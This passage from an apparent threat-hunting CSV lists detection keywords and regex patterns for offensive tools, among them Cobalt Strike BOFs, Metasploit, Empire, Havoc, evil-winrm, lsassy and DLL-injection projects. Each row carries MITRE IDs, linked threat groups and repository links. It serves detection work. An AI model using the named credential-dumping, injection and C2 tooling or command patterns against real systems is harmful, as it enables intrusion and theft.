T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","41103" "*DLL_Imports_BOF*",".{0,1000}DLL_Imports_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","41104" "*dll_inject.exe *",".{0,1000}dll_inject\.exe\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","41105" "*dll_inject.rb*",".{0,1000}dll_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41106" "*DLL_METASPLOIT_ATTACH*",".{0,1000}DLL_METASPLOIT_ATTACH.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","41107" "*dll_spawn_cmd.cpp*",".{0,1000}dll_spawn_cmd\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error 
Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","41108" "*dll_spawn_cmd.exe*",".{0,1000}dll_spawn_cmd\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","41109" "*DLL_TO_HIJACK_WIN10*",".{0,1000}DLL_TO_HIJACK_WIN10.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","41110" "*dllexploit.*",".{0,1000}dllexploit\..{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","41111" "*DllExport -*",".{0,1000}DllExport\s\-.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","41112" "*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41113" "*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41114" "*DLLHijackAuditKit.zip*",".{0,1000}DLLHijackAuditKit\.zip.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41115" "*DLL-Hijack-Search-Order-BOF*",".{0,1000}DLL\-Hijack\-Search\-Order\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","41116" "*DLLHijackTest.dll*",".{0,1000}DLLHijackTest\.dll.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","41117" "*DLLHijackTest.sln*",".{0,1000}DLLHijackTest\.sln.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","41118" "*DLLHijackTest-master*",".{0,1000}DLLHijackTest\-master.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","41119" "*dllinject *",".{0,1000}dllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41120" "*dllinject.py*",".{0,1000}dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41121" "*DllInjection.dll*",".{0,1000}DllInjection\.dll.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","41122" "*-DllInjection.ps1*",".{0,1000}\-DllInjection\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41123" "*DllInstall is used when executing the 
Merlin agent with regsvr32.exe*",".{0,1000}DllInstall\sis\sused\swhen\sexecuting\sthe\sMerlin\sagent\swith\sregsvr32\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","41124" "*dllKitten.dll*",".{0,1000}dllKitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","41125" "*DllLdr.x64.bin*",".{0,1000}DllLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","41126" "*Dll-Loader -http -path *",".{0,1000}Dll\-Loader\s\-http\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. 
Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41127" "*Dll-Loader -local -path*",".{0,1000}Dll\-Loader\s\-local\s\-path.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41128" "*Dll-Loader -smb -path *",".{0,1000}Dll\-Loader\s\-smb\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41129" "*DllLoaderLoader.exe*",".{0,1000}DllLoaderLoader\.exe.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","41130" "*-DllName *-Module *",".{0,1000}\-DllName\s.{0,1000}\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41131" "*DllNotificationInjection.cpp*",".{0,1000}DllNotificationInjection\.cpp.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41132" 
"*DllNotificationInjection.exe*",".{0,1000}DllNotificationInjection\.exe.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41133" "*DllNotificationInjection.sln*",".{0,1000}DllNotificationInjection\.sln.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41134" "*DllNotificationInjection.vcxproj*",".{0,1000}DllNotificationInjection\.vcxproj.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","41135" "*DllNotificationInjection-master*",".{0,1000}DllNotificationInjection\-master.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
